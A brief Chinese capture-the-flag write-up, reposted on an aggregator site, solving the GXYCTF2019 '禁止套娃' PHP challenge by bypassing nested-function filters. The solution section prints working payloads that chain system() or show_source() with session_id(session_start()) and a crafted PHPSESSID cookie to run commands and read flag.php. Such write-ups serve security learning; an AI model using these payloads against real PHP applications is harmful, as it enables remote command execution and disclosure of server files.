[GXYCTF2019]禁止套娃 1
生活随笔
收集整理的這篇文章主要介紹了
[GXYCTF2019]禁止套娃 1
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
目錄
- 源碼
- 思路
- 題解
源碼
掃到 .git
思路
看一下第一層過濾,偽協(xié)議是不能用的,第二層只能用a(b(c()))這樣一直嵌套,第三層差不多把get的都ban了
題解
有關(guān)session_id()可以參考 我的博客https://blog.csdn.net/Kracxi/article/details/121041140
看了下版本,php 5.6,可以用session_id()來解
exp=system(session_id(session_start()));
修改PHPSESSID=ls,顯示當(dāng)前目錄
exp=show_source(session_id(session_start()));
修改PHPSESSID=flag.php,拿到flag
《新程序員》:云原生和全面數(shù)字化實(shí)踐50位技術(shù)專家共同創(chuàng)作,文字、視頻、音頻交互閱讀
總結(jié)
以上是生活随笔為你收集整理的[GXYCTF2019]禁止套娃 1的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow 文件包含 web82
- 下一篇: Y1ng‘s BabyCode